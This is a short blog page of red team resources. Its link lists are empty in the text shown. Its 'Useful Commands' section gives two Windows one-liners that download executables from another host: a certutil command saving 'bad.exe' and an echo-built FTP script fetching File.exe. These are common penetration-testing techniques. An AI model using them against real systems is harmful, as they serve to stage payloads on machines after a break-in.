Favorite Resources

This is just a list of my favorite resources for doing red team stuff. It’s not a complete list I’m sure. I’ll keep adding to it over time. If you have something you think should be on here, please hit me up @DotNetRussell

Cheat Sheets

Encoder/Decoder

Tools

Useful Commands

  • Download Files on Windows
    • certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe
  • Download files on Windows
    • (echo open 10.10.14.20&echo <user>&echo <password>&echo binary&echo get File.exe&echo bye) > ftp.txt & ftp -s:ftp.txt
  • Install pip3
    • sudo apt-get -y install python3-pip

Penetration Testing Labs

Bug Bounties

Other

Leave a Reply

5 × one =